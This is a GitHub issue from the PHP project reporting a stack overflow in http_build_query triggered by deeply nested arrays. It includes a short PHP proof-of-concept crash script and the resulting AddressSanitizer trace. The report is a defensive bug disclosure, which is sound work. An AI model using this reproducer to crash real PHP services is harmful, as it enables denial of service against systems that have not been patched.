Skip to content

Stack overflow in http_build_query via deep structures #20583

New issue
New issue
Closed
Closed
Stack overflow in http_build_query via deep structures#20583
Assignees
ndossche
Labels
BugExtension: standardStatus: Verified
@012git012

Description

@012git012
012git012
opened on Nov 25, 2025

Description

The following code:

// PoC: Stack overflow in http_build_query via unbounded recursion
// Builds a deeply nested array and calls http_build_query() to force deep C recursion
// Expected: AddressSanitizer/stack overflow crash or segfault
ini_set('memory_limit', '-1');
$depth = isset($argv[1]) ? (int)$argv[1] : 50000; // adjust as needed
fwrite(STDERR, "[i] Building nested array to depth {$depth}\n");
$a = null;
for ($i = 0; $i < $depth; $i++) {
 $a = [$i => $a];
}
fwrite(STDERR, "[i] Starting http_build_query()...\n");
// Use a small prefix to exercise integer-index path; not required for crash
$q = http_build_query($a, 'p');
// If it somehow returns, print small confirmation
echo "len=" . strlen($q) . "\n";

Resulted in this output:

$ ./php cli.php
[i] Building nested array to depth 50000
[i] Starting http_build_query()...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==850581==ERROR: AddressSanitizer: stack-overflow on address 0x7fff75560f08 (pc 0x7986730a9080 bp 0x7fff755617a0 sp 0x7fff75560f10 T0)
    #0 0x7986730a9080 in prctl ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249
    #1 0x6110da2db0fe in zend_mmap_set_name /home/administrator/php/php-src/Zend/zend_mmap.h:40
    #2 0x6110da2db6cc in zend_mm_mmap /home/administrator/php/php-src/Zend/zend_alloc.c:562
    #3 0x6110da2dc035 in zend_mm_chunk_alloc_int /home/administrator/php/php-src/Zend/zend_alloc.c:743
    #4 0x6110da2dc288 in zend_mm_chunk_alloc /home/administrator/php/php-src/Zend/zend_alloc.c:810
    #5 0x6110da2dce37 in zend_mm_alloc_pages /home/administrator/php/php-src/Zend/zend_alloc.c:1051
    #6 0x6110da2dd4a5 in zend_mm_alloc_large_ex /home/administrator/php/php-src/Zend/zend_alloc.c:1121
    #7 0x6110da2dd58b in zend_mm_alloc_large /home/administrator/php/php-src/Zend/zend_alloc.c:1138
    #8 0x6110da2df223 in zend_mm_alloc_heap /home/administrator/php/php-src/Zend/zend_alloc.c:1498
    #9 0x6110da2e6016 in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2783
    #10 0x6110da6d6f09 in zend_string_alloc /home/administrator/php/php-src/Zend/zend_string.h:167
    #11 0x6110da6d9222 in zend_string_concat3 /home/administrator/php/php-src/Zend/zend_string.c:493
    #12 0x6110d9f9dbc7 in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:180
    #13 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #14 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #15 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
…
#245 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #246 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189

SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249 in prctl
==850581==ABORTING

Build configuration:

$ ./configure CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address" --enable-debug

Researcher: Nikita Sveshnikov (Positive Technologies)

PHP Version

PHP 8.6.0-dev (cli) (built: Nov 18 2025 10:57:54) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
    with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies

Operating System

Ubuntu 24.04.2 LTS

Metadata

Metadata

Assignees

Labels

BugExtension: standardStatus: Verified

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions